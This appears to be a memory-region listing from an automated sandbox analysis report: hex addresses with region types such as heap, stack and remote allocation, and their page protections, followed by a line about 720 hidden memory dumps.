2293BD5A000
heap
page read and write
7CD0000
trusted library allocation
page read and write
54BB000
heap
page read and write
2293BD95000
heap
page read and write
7B40000
heap
page execute and read and write
5BFF000
trusted library allocation
page read and write
2293C034000
heap
page read and write
2A7D000
stack
page read and write
7600000
direct allocation
page read and write
2293BD46000
heap
page read and write
2293BE65000
heap
page read and write
2293BD70000
heap
page read and write
3590000
trusted library allocation
page read and write
354D000
trusted library allocation
page execute and read and write
50FF000
stack
page read and write
1A0CB15D000
trusted library allocation
page read and write
8BD0000
trusted library allocation
page read and write
2293C304000
heap
page read and write
7A30000
heap
page read and write
1A0DA930000
trusted library allocation
page read and write
7FF848EDC000
trusted library allocation
page execute and read and write
5E2E9BB000
stack
page read and write
5E2F50B000
stack
page read and write
2293BD74000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
33B0000
heap
page read and write
2293C139000
heap
page read and write
2293BEB6000
heap
page read and write
2293B9A0000
remote allocation
page read and write
7FF849140000
trusted library allocation
page read and write
20C60000
remote allocation
page read and write
2293BD61000
heap
page read and write
5858CFC000
stack
page read and write
364B000
heap
page read and write
1A0C8AF0000
heap
page read and write
2BF0000
heap
page read and write
2293BD07000
heap
page read and write
3543000
trusted library allocation
page execute and read and write
7EF0000
trusted library allocation
page read and write
5E2E3FE000
stack
page read and write
1A0E2EF2000
heap
page read and write
1A0CAB49000
trusted library allocation
page read and write
50BE000
stack
page read and write
2293BE84000
heap
page read and write
2293BD85000
heap
page read and write
2293BEB6000
heap
page read and write
1A0E2D80000
heap
page read and write
88C7000
stack
page read and write
5E2E37C000
stack
page read and write
5E2E8BE000
stack
page read and write
54BE000
heap
page read and write
2293BD98000
heap
page read and write
2293BE79000
heap
page read and write
1A0CADA6000
trusted library allocation
page read and write
7FF848F40000
trusted library allocation
page execute and read and write
2D6CBAD000
stack
page read and write
3570000
trusted library allocation
page read and write
2293BE0D000
heap
page read and write
7E10000
trusted library allocation
page execute and read and write
2293BD41000
heap
page read and write
54C1000
heap
page read and write
20B7E000
stack
page read and write
2293BD56000
heap
page read and write
7DAE000
stack
page read and write
8EC0000
trusted library allocation
page read and write
20AAE000
stack
page read and write
7FF848E3B000
trusted library allocation
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
1A0CA520000
heap
page readonly
2293BD1C000
heap
page read and write
5420000
direct allocation
page read and write
22939E6D000
heap
page read and write
22939F3E000
heap
page read and write
1A0CA530000
trusted library allocation
page read and write
2293C0F6000
heap
page read and write
2293BE91000
heap
page read and write
2293BE50000
heap
page read and write
22939E69000
heap
page read and write
1A0CC76C000
trusted library allocation
page read and write
748E000
stack
page read and write
54A7000
heap
page read and write
2293BD93000
heap
page read and write
2293C182000
heap
page read and write
7FF848EE0000
trusted library allocation
page execute and read and write
2293BE9E000
heap
page read and write
2293BD6E000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
3617000
heap
page read and write
2293BE9B000
heap
page read and write
1A0CA877000
heap
page execute and read and write
4F79000
heap
page read and write
755D000
stack
page read and write
7FF848FC0000
trusted library allocation
page read and write
1A0CA4F0000
trusted library allocation
page read and write
8E4E000
stack
page read and write
2293B9B0000
heap
page read and write
1A0CBD7D000
trusted library allocation
page read and write
1A0E2EA5000
heap
page read and write
2293BD5A000
heap
page read and write
2293BD5A000
heap
page read and write
1A0CB183000
trusted library allocation
page read and write
1A0DAC15000
trusted library allocation
page read and write
2293C09C000
heap
page read and write
7B58000
trusted library allocation
page read and write
1A0C8B5A000
heap
page read and write
5448000
heap
page read and write
2293C000000
heap
page read and write
33FD000
stack
page read and write
5E2E47E000
stack
page read and write
74CF000
stack
page read and write
1A0CA780000
heap
page read and write
2293BD31000
heap
page read and write
1A0E2E9B000
heap
page read and write
2293BE01000
heap
page read and write
75B0000
direct allocation
page read and write
2293C1D0000
heap
page read and write
1A0CA810000
heap
page execute and read and write
2293C0E0000
heap
page read and write
1A0CA921000
trusted library allocation
page read and write
2293C12A000
heap
page read and write
22939F2A000
heap
page read and write
2293C088000
heap
page read and write
7CB7000
trusted library allocation
page read and write
4F40000
heap
page execute and read and write
7B81000
heap
page read and write
2293BD5A000
heap
page read and write
2293BD83000
heap
page read and write
2293C145000
heap
page read and write
5B83000
trusted library allocation
page read and write
8D4C000
stack
page read and write
8A28000
heap
page read and write
76BA000
stack
page read and write
75E0000
direct allocation
page read and write
1A0C8BA6000
heap
page read and write
2293C254000
heap
page read and write
63B7000
trusted library allocation
page read and write
20540000
direct allocation
page read and write
2293BD5B000
heap
page read and write
20C60000
remote allocation
page read and write
4EF8000
trusted library allocation
page read and write
2293BE01000
heap
page read and write
2293C142000
heap
page read and write
1A0CADBF000
trusted library allocation
page read and write
7CB0000
trusted library allocation
page read and write
7F3B000
stack
page read and write
2293C0F8000
heap
page read and write
20BBD000
stack
page read and write
1A0CC6F9000
trusted library allocation
page read and write
2293BEB6000
heap
page read and write
2293BD78000
heap
page read and write
15A10CA5000
heap
page read and write
75C0000
direct allocation
page read and write
8EF0000
direct allocation
page read and write
2293BD5F000
heap
page read and write
2293BE7C000
heap
page read and write
75A0000
direct allocation
page read and write
54FD000
heap
page read and write
2293BD67000
heap
page read and write
2293BE81000
heap
page read and write
3550000
trusted library allocation
page read and write
4F10000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
2293C0E0000
heap
page read and write
7DED000
stack
page read and write
54A7000
heap
page read and write
1A0CA5A0000
trusted library allocation
page read and write
2293BD5A000
heap
page read and write
8A69000
heap
page read and write
2293BD8D000
heap
page read and write
22939E68000
heap
page read and write
7E70000
trusted library allocation
page read and write
2293BEA3000
heap
page read and write
4F70000
heap
page read and write
54FA000
heap
page read and write
1A0CA910000
heap
page execute and read and write
22939E60000
heap
page read and write
3544000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
385D000
heap
page read and write
2293BE89000
heap
page read and write
204F0000
direct allocation
page read and write
2A00000
remote allocation
page execute and read and write
2293C321000
heap
page read and write
7FF848FF0000
trusted library allocation
page execute and read and write
2293C257000
heap
page read and write
2293BD5A000
heap
page read and write
2293BD83000
heap
page read and write
57A0000
heap
page read and write
15A10CA0000
heap
page read and write
8A51000
heap
page read and write
54FC000
heap
page read and write
7E90000
trusted library allocation
page read and write
2293C079000
heap
page read and write
7FF848E2D000
trusted library allocation
page execute and read and write
5269000
trusted library allocation
page read and write
8F90000
direct allocation
page read and write
7FF848E22000
trusted library allocation
page read and write
2293BD24000
heap
page read and write
8E90000
trusted library allocation
page read and write
7A69000
heap
page read and write
7E30000
heap
page read and write
2293C0F6000
heap
page read and write
7E00000
trusted library allocation
page read and write
2293BD06000
heap
page read and write
3840000
trusted library allocation
page execute and read and write
77BD000
stack
page read and write
1A0CC991000
trusted library allocation
page read and write
356A000
trusted library allocation
page execute and read and write
A411000
direct allocation
page execute and read and write
2293C097000
heap
page read and write
7FF848ED6000
trusted library allocation
page read and write
7FF849180000
trusted library allocation
page read and write
5858BFB000
stack
page read and write
1A0CC6FD000
trusted library allocation
page read and write
2293C121000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
2293BD14000
heap
page read and write
2293BD6F000
heap
page read and write
2293BD93000
heap
page read and write
22939E30000
heap
page read and write
54BB000
heap
page read and write
2293BD04000
heap
page read and write
3645000
heap
page read and write
7FF849002000
trusted library allocation
page read and write
22939E65000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
20C9E000
stack
page read and write
3160000
heap
page read and write
2293BD5A000
heap
page read and write
1A0CC6DA000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
2293BD5A000
heap
page read and write
2293BD69000
heap
page read and write
1A0C8E95000
heap
page read and write
1A0CAD92000
trusted library allocation
page read and write
2293BEA6000
heap
page read and write
2293C0DA000
heap
page read and write
2293BE94000
heap
page read and write
1A0C8AD0000
heap
page read and write
22939F3D000
heap
page read and write
3510000
trusted library section
page read and write
5430000
direct allocation
page read and write
2293C0BA000
heap
page read and write
2293BD64000
heap
page read and write
2293C101000
heap
page read and write
2293C132000
heap
page read and write
2293C25B000
heap
page read and write
7FF848ED0000
trusted library allocation
page read and write
2293BE58000
heap
page read and write
2293BE35000
heap
page read and write
204E0000
direct allocation
page read and write
7FF849100000
trusted library allocation
page read and write
1A0E2E91000
heap
page read and write
1A0C8B10000
heap
page read and write
1A0CA606000
heap
page read and write
2293C08B000
heap
page read and write
2293BE8C000
heap
page read and write
2293C0E0000
heap
page read and write
5858FFE000
stack
page read and write
1A0E2F1B000
heap
page read and write
2293BD61000
heap
page read and write
2293BD98000
heap
page read and write
3830000
heap
page readonly
2293C0A6000
heap
page read and write
2BA1000
remote allocation
page execute and read and write
2293C1D0000
heap
page read and write
204D0000
direct allocation
page read and write
5E2E27E000
stack
page read and write
1A0CC8A3000
trusted library allocation
page read and write
2293BD13000
heap
page read and write
5E2E93E000
stack
page read and write
2293BEB6000
heap
page read and write
2293BD02000
heap
page read and write
7EA0000
trusted library allocation
page read and write
7FF849160000
trusted library allocation
page read and write
2293B9A0000
remote allocation
page read and write
2293C09D000
heap
page read and write
343F000
stack
page read and write
3654000
heap
page read and write
3277000
stack
page read and write
2293BE38000
heap
page read and write
2293BD61000
heap
page read and write
20530000
direct allocation
page read and write
2293BE74000
heap
page read and write
5CAB000
trusted library allocation
page read and write
2293C0F7000
heap
page read and write
2293BEB6000
heap
page read and write
89E0000
heap
page read and write
22939E70000
heap
page read and write
7C70000
trusted library allocation
page read and write
5858AFF000
stack
page read and write
5E2E6B7000
stack
page read and write
1A0CC714000
trusted library allocation
page read and write
3850000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
2293C0E0000
heap
page read and write
22939E6D000
heap
page read and write
5310000
heap
page read and write
2293BD5A000
heap
page read and write
516D000
trusted library allocation
page read and write
7630000
heap
page execute and read and write
2293C24C000
heap
page read and write
2293BEB6000
heap
page read and write
5E2E738000
stack
page read and write
2293BD5A000
heap
page read and write
5330000
heap
page read and write
22939FF3000
heap
page read and write
4EEE000
stack
page read and write
503E000
stack
page read and write
2293BE71000
heap
page read and write
54FC000
heap
page read and write
2293C06E000
heap
page read and write
58587FF000
stack
page read and write
2293BD5C000
heap
page read and write
2293BD83000
heap
page read and write
5858399000
stack
page read and write
2293BD38000
heap
page read and write
2C6C000
heap
page read and write
3559000
trusted library allocation
page read and write
773B000
stack
page read and write
7FF8490D0000
trusted library allocation
page read and write
22939E6E000
heap
page read and write
20AEF000
stack
page read and write
2293C052000
heap
page read and write
2293BE68000
heap
page read and write
1A0CA600000
heap
page read and write
2293C0F6000
heap
page read and write
2C60000
heap
page read and write
B811000
direct allocation
page execute and read and write
2293BD89000
heap
page read and write
2293BD4E000
heap
page read and write
7E80000
trusted library allocation
page read and write
8E8D000
stack
page read and write
7FF8490C0000
trusted library allocation
page read and write
15A10B00000
heap
page read and write
1A0CC6D7000
trusted library allocation
page read and write
2293BD6D000
heap
page read and write
5790000
direct allocation
page read and write
2293BD5A000
heap
page read and write
2293BE30000
heap
page read and write
2293C0FA000
heap
page read and write
2293C0BA000
heap
page read and write
3520000
trusted library section
page read and write
363E000
heap
page read and write
8F20000
direct allocation
page read and write
20A2E000
stack
page read and write
20500000
direct allocation
page read and write
549F000
heap
page read and write
15A10930000
heap
page read and write
1A0E2C6B000
heap
page read and write
1A0CA9A7000
trusted library allocation
page read and write
22939F07000
heap
page read and write
4FBC000
stack
page read and write
2293C0AA000
heap
page read and write
2293BD83000
heap
page read and write
2C3E000
unkown
page read and write
2293BE60000
heap
page read and write
20C60000
remote allocation
page read and write
2293BD2C000
heap
page read and write
2293BD93000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
1A0C8B64000
heap
page read and write
76FE000
stack
page read and write
22939F29000
heap
page read and write
2293C088000
heap
page read and write
6139000
trusted library allocation
page read and write
7635000
heap
page execute and read and write
75F0000
direct allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
2293BD5A000
heap
page read and write
2293C3D5000
heap
page read and write
89A0000
heap
page read and write
2293BE99000
heap
page read and write
3440000
heap
page read and write
2293BD7C000
heap
page read and write
2293BE48000
heap
page read and write
1A0DA941000
trusted library allocation
page read and write
7FF848E24000
trusted library allocation
page read and write
5E2E2FE000
stack
page read and write
7FF849170000
trusted library allocation
page read and write
54BB000
heap
page read and write
22939F00000
heap
page read and write
5E2E5BE000
stack
page read and write
2293BE40000
heap
page read and write
7CDA000
trusted library allocation
page read and write
2293BD21000
heap
page read and write
1A0CC770000
trusted library allocation
page read and write
2293C0E0000
heap
page read and write
7FF849150000
trusted library allocation
page read and write
7FF849190000
trusted library allocation
page read and write
2293C0B3000
heap
page read and write
7FF848F06000
trusted library allocation
page execute and read and write
2293BD0C000
heap
page read and write
2293BD5A000
heap
page read and write
7FF849060000
trusted library allocation
page read and write
2293BE3D000
heap
page read and write
1A0C8B1E000
heap
page read and write
2293BEB6000
heap
page read and write
5938000
trusted library allocation
page read and write
20D2C000
stack
page read and write
2293C0E0000
heap
page read and write
1A0DAC06000
trusted library allocation
page read and write
2293BD2C000
heap
page read and write
2F2E000
unkown
page read and write
2293C001000
heap
page read and write
2293C013000
heap
page read and write
7D6F000
stack
page read and write
22939FF3000
heap
page read and write
2293BD09000
heap
page read and write
8BF0000
trusted library allocation
page execute and read and write
20DEF000
stack
page read and write
8F80000
direct allocation
page read and write
2293BD83000
heap
page read and write
78C0000
heap
page read and write
2293BD5A000
heap
page read and write
2293C04D000
heap
page read and write
2D6CEFF000
unkown
page read and write
1A0CADAA000
trusted library allocation
page read and write
2293BD11000
heap
page read and write
2293BEAB000
heap
page read and write
2293BEB3000
heap
page read and write
2293C0BA000
heap
page read and write
2293BD02000
heap
page read and write
306F000
stack
page read and write
4EAE000
stack
page read and write
549F000
heap
page read and write
2293BE9E000
heap
page read and write
2293C100000
heap
page read and write
54FD000
heap
page read and write
2293BEAE000
heap
page read and write
9A11000
direct allocation
page execute and read and write
2293BD5A000
heap
page read and write
2293C0BA000
heap
page read and write
2293BEB6000
heap
page read and write
2293C0F6000
heap
page read and write
2293C1A6000
heap
page read and write
2293BD5A000
heap
page read and write
20DAE000
stack
page read and write
49A1000
remote allocation
page execute and read and write
54C1000
heap
page read and write
7FF849130000
trusted library allocation
page read and write
1A0E2ED6000
heap
page read and write
2293C0B3000
heap
page read and write
2293BE05000
heap
page read and write
5480000
heap
page read and write
2293BD5A000
heap
page read and write
8E0C000
stack
page read and write
75D0000
direct allocation
page read and write
5E2E579000
stack
page read and write
1A0E2CC0000
heap
page read and write
2293BD0A000
heap
page read and write
2293BEB6000
heap
page read and write
5410000
heap
page readonly
8F00000
direct allocation
page read and write
1A0CBF66000
trusted library allocation
page read and write
1A0CC730000
trusted library allocation
page read and write
1A0CC822000
trusted library allocation
page read and write
2293C07F000
heap
page read and write
2293C156000
heap
page read and write
7CE0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
1A0CC72E000
trusted library allocation
page read and write
5E2E4FE000
stack
page read and write
1A0CC6EE000
trusted library allocation
page read and write
2293C841000
heap
page read and write
2293C143000
heap
page read and write
1A0CB1B8000
trusted library allocation
page read and write
1A0CB19E000
trusted library allocation
page read and write
777E000
stack
page read and write
2293C045000
heap
page read and write
2293BE25000
heap
page read and write
7A2E000
stack
page read and write
2293BD98000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
54FF000
heap
page read and write
7C80000
trusted library allocation
page read and write
20520000
direct allocation
page read and write
2293BD24000
heap
page read and write
1A0CC716000
trusted library allocation
page read and write
8DCE000
stack
page read and write
2293BD5C000
heap
page read and write
1A0CA560000
trusted library allocation
page read and write
89B0000
heap
page read and write
7FF849010000
trusted library allocation
page execute and read and write
2293BD30000
heap
page read and write
7EC0000
trusted library allocation
page read and write
2293BD06000
heap
page read and write
2293BE10000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
1A0CB1D2000
trusted library allocation
page read and write
1A0CC1E4000
trusted library allocation
page read and write
22939E69000
heap
page read and write
2293BD5A000
heap
page read and write
2745000
direct allocation
page read and write
2293C088000
heap
page read and write
54BF000
heap
page read and write
1A0E2E63000
heap
page read and write
1A0CC1E0000
trusted library allocation
page read and write
7B24000
heap
page read and write
1A0CC6F0000
trusted library allocation
page read and write
78B0000
heap
page read and write
1A0CA615000
heap
page read and write
1A0E2D17000
heap
page read and write
2293BD49000
heap
page read and write
2293C721000
heap
page read and write
2293C10F000
heap
page read and write
54B4000
heap
page read and write
2293BD64000
heap
page read and write
88F0000
trusted library allocation
page read and write
2F6E000
stack
page read and write
2293BD5A000
heap
page read and write
2293BD51000
heap
page read and write
2740000
direct allocation
page read and write
1A0C8B60000
heap
page read and write
2293BD80000
heap
page read and write
5E2F58B000
stack
page read and write
5E2F40E000
stack
page read and write
2293BE4D000
heap
page read and write
35D5000
heap
page read and write
32D0000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
5111000
trusted library allocation
page read and write
1A0DA921000
trusted library allocation
page read and write
1A0C8B57000
heap
page read and write
7D2E000
stack
page read and write
2293BD29000
heap
page read and write
2293C1D1000
heap
page read and write
209AE000
stack
page read and write
8EB0000
trusted library allocation
page read and write
1A0CBD79000
trusted library allocation
page read and write
20B3D000
stack
page read and write
2293BE18000
heap
page read and write
2293B9A0000
remote allocation
page read and write
2293C12A000
heap
page read and write
1A0CB1E1000
trusted library allocation
page read and write
35A0000
heap
page read and write
5497000
heap
page read and write
2293C040000
heap
page read and write
2293BD4B000
heap
page read and write
5858EFE000
stack
page read and write
88D0000
trusted library allocation
page execute and read and write
34DE000
stack
page read and write
9870000
direct allocation
page execute and read and write
2293C096000
heap
page read and write
54FC000
heap
page read and write
1A0C8B28000
heap
page read and write
15A10870000
heap
page read and write
2293C0F6000
heap
page read and write
7F040000
trusted library allocation
page execute and read and write
2293BD5A000
heap
page read and write
5100000
heap
page read and write
7E60000
trusted library allocation
page read and write
54FD000
heap
page read and write
2293BD79000
heap
page read and write
7AB0000
heap
page read and write
2293BE6D000
heap
page read and write
2293BE5D000
heap
page read and write
3560000
trusted library allocation
page read and write
5E2F38E000
stack
page read and write
33BA000
heap
page read and write
1A0E3160000
heap
page read and write
1A0E2F04000
heap
page read and write
1A0CB0A5000
trusted library allocation
page read and write
2293BE55000
heap
page read and write
5920000
trusted library allocation
page read and write
1A0CA4B0000
heap
page read and write
4FFE000
stack
page read and write
2293C0BA000
heap
page read and write
7ACA000
heap
page read and write
2293C0E0000
heap
page read and write
7A5D000
heap
page read and write
1A0CADAE000
trusted library allocation
page read and write
2293C0FA000
heap
page read and write
35AE000
heap
page read and write
22939E68000
heap
page read and write
1A0E2EFC000
heap
page read and write
2293BE15000
heap
page read and write
3572000
trusted library allocation
page read and write
1A0CAE12000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
899E000
stack
page read and write
2293C0BA000
heap
page read and write
34F0000
heap
page read and write
58590FB000
stack
page read and write
3540000
trusted library allocation
page read and write
1A0C8BA0000
heap
page read and write
323C000
stack
page read and write
2293C156000
heap
page read and write
2293BD83000
heap
page read and write
20550000
direct allocation
page read and write
2293BE2D000
heap
page read and write
895D000
stack
page read and write
2293BD01000
heap
page read and write
3622000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
7FF848FD1000
trusted library allocation
page read and write
2BE0000
heap
page read and write
8F70000
trusted library allocation
page read and write
8F10000
direct allocation
page read and write
7DF427DF0000
trusted library allocation
page execute and read and write
1A0CA510000
trusted library allocation
page read and write
2293C0BA000
heap
page read and write
8C65000
trusted library allocation
page read and write
5440000
heap
page read and write
22939E40000
heap
page read and write
89D0000
heap
page read and write
2293C0E0000
heap
page read and write
2293C0F6000
heap
page read and write
54C0000
heap
page read and write
327D000
stack
page read and write
2293BD70000
heap
page read and write
2293BE01000
heap
page read and write
5E2DF63000
stack
page read and write
1A0C8E90000
heap
page read and write
2293BD98000
heap
page read and write
2B7E000
stack
page read and write
7CC0000
trusted library allocation
page read and write
2293C13D000
heap
page read and write
15A1093A000
heap
page read and write
2293BD4B000
heap
page read and write
1A0CAFDE000
trusted library allocation
page read and write
2293BD3D000
heap
page read and write
2293C067000
heap
page read and write
15A10890000
heap
page read and write
35E1000
heap
page read and write
349E000
stack
page read and write
2293BE28000
heap
page read and write
6173000
trusted library allocation
page read and write
20510000
direct allocation
page read and write
2293BE1D000
heap
page read and write
2293BD5A000
heap
page read and write
3575000
trusted library allocation
page execute and read and write
2293BEB6000
heap
page read and write
1A0CAD9C000
trusted library allocation
page read and write
2293BEB6000
heap
page read and write
20D6C000
stack
page read and write
1A0E2C60000
heap
page read and write
2293BD83000
heap
page read and write
2293BD7B000
heap
page read and write
2293C221000
heap
page read and write
8ED0000
trusted library allocation
page execute and read and write
2293BD01000
heap
page read and write
2293C0B5000
heap
page read and write
3FA1000
remote allocation
page execute and read and write
20BFC000
stack
page read and write
1A0E2E60000
heap
page read and write
54BF000
heap
page read and write
6121000
trusted library allocation
page read and write
2293BE08000
heap
page read and write
2293BE20000
heap
page read and write
1A0C8B5C000
heap
page read and write
There are 720 hidden memdumps, click here to show them.